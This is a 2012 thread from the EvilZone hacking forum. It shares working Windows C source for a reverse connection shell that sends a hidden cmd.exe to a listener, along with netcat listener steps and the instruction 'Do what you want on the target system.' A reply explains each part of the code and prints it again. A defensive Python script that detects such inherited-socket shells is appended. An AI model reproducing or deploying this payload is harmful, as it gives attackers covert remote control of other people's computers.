EvilZone


: Reverse Connection Shell (code)
: Infinityexists March 17, 2012, 06:53:06 PM

I've found this somewhere but didn't understand how it works; maybe some of you could help me understand this.

Reverse Connection Shell

This would be used to connect back to you and spawn a CMD shell on the target's system. Yes, you can use the CMD on the target system; that is the whole point.

1. Set Netcat to listen on your system with the Port and IP specified in the example (change both to your liking): nc -lvvp 1977.

2. When someone runs this RevCon it connects back to you through the Port and IP specified and gives you a CMD shell on their system through Netcat.

3. Do what you want on the target system.

:
#include <winsock2.h>
#pragma comment(lib,"ws2_32")


void main()
{
WSADATA a;
SOCKET b;
STARTUPINFO c;
PROCESS_INFORMATION d;
struct sockaddr_in e;
memset(&e,0,sizeof(e));
memset(&c,0,sizeof(c));
WSAStartup(0x202,&a);                                      //Version: 0x202 = 2.2
b=WSASocket(2,1,6,0,0,0);
e.sin_family=0x2;                                        //0x2 = AF_INET
e.sin_port=ntohs(0x7B9);                                //Port: 0x7B9 = 1977
e.sin_addr.s_addr=inet_addr("127.0.0.1");
connect(b,(struct sockaddr*)&e,sizeof(e));
c.cb=sizeof(c);
c.dwFlags=0x00000100;                                 //0x00000100 = STARTF_USESTDHANDLES
c.hStdInput=c.hStdOutput=c.hStdError=(void*)b;
CreateProcess(0,"cmd",0,0,1,0x08000000,0,0,&c,&d);  //1 = TRUE, 0x08000000 = CREATE_NO_WINDOW
}
: Re: Reverse Connection Shell (code)
: Kulverstukas March 17, 2012, 07:23:57 PM
I think you just answered your own question :P

BTW: Why such big spaces between paragraphs?
: Re: Reverse Connection Shell (code)
: neusbeer March 17, 2012, 07:27:13 PM
I think you just answered your own question :P

BTW: Why such big spaces between paragraphs?
I have the same 'problem'... I always have to edit again to delete the extra empty spaces.
One line break acts as two; something to do with Unix or Windows character encoding.
: Re: Reverse Connection Shell (code)
: ca0s March 17, 2012, 11:46:08 PM
What are you asking for? A description of how the code works?
It opens a socket to the desired address (127.0.0.1 in the code). This is the biggest part of the code:
:
WSADATA a;
SOCKET b;
struct sockaddr_in e;
memset(&e,0,sizeof(e));

WSAStartup(0x202,&a);                                      //Version: 0x202 = 2.2
b=WSASocket(2,1,6,0,0,0);
e.sin_family=0x2;                                        //0x2 = AF_INET
e.sin_port=ntohs(0x7B9);                                //Port: 0x7B9 = 1977
e.sin_addr.s_addr=inet_addr("127.0.0.1");
connect(b,(struct sockaddr*)&e,sizeof(e));
Then it creates a cmd.exe process with its stdin and stdout handles redirected to that socket.
:
STARTUPINFO c;
PROCESS_INFORMATION d;

memset(&c,0,sizeof(c));

c.cb=sizeof(c);
c.dwFlags=0x00000100;                                 //0x00000100 = STARTF_USESTDHANDLES
c.hStdInput=c.hStdOutput=c.hStdError=(void*)b;
CreateProcess(0,"cmd",0,0,1,0x08000000,0,0,&c,&d);  //1 = TRUE, 0x08000000 = CREATE_NO_WINDOW
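One consequence of the layout ca0s describes (the parent calls connect(), then CreateProcess with STARTF_USESTDHANDLES) is that the TCP connection belongs to the parent's PID, not to cmd.exe. The triage check below is an added example, not code from the thread; it flags a cmd.exe whose parent holds an established connection. The netstat text and process list are constructed sample data in the shape of `netstat -ano` and a PID/PPID/name listing, and revcon.exe is a made-up name.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of `netstat -ano` output (not captured from a real host).
NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.20:49712     203.0.113.5:1977       ESTABLISHED     4120
  TCP    192.168.1.20:49720     192.168.1.9:445        ESTABLISHED     4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
"""

# Constructed process list as (pid, ppid, image name); revcon.exe is a hypothetical name.
PROCESSES = [
    (912, 640, "svchost.exe"),
    (4120, 3300, "revcon.exe"),
    (4188, 4120, "cmd.exe"),   # child of the process that owns the socket
    (4200, 3300, "cmd.exe"),   # ordinary shell, parent has no connection listed
]

NETSTAT_RE = re.compile(r"^\s*TCP\s+(\S+)\s+(\S+):(\d+)\s+ESTABLISHED\s+(\d+)\s*$")


def established_by_pid(netstat_text):
    """Map PID -> list of (remote_ip, remote_port) for ESTABLISHED TCP rows."""
    conns = defaultdict(list)
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            conns[int(m.group(4))].append((m.group(2), int(m.group(3))))
    return conns


def find_inherited_socket_shells(processes, netstat_text):
    """Return (cmd_pid, parent_name, (remote_ip, remote_port)) for every cmd.exe
    whose parent process owns an established TCP connection. The socket was
    inherited via STARTF_USESTDHANDLES, so it never appears under cmd.exe itself."""
    conns = established_by_pid(netstat_text)
    by_pid = {pid: (ppid, name) for pid, ppid, name in processes}
    hits = []
    for pid, ppid, name in processes:
        if name.lower() != "cmd.exe" or ppid not in by_pid:
            continue
        parent_name = by_pid[ppid][1]
        for remote in conns.get(ppid, []):
            hits.append((pid, parent_name, remote))
    return hits


if __name__ == "__main__":
    for pid, parent, (ip, port) in find_inherited_socket_shells(PROCESSES, NETSTAT):
        print(f"cmd.exe pid {pid} spawned by {parent}, which holds a connection to {ip}:{port}")
```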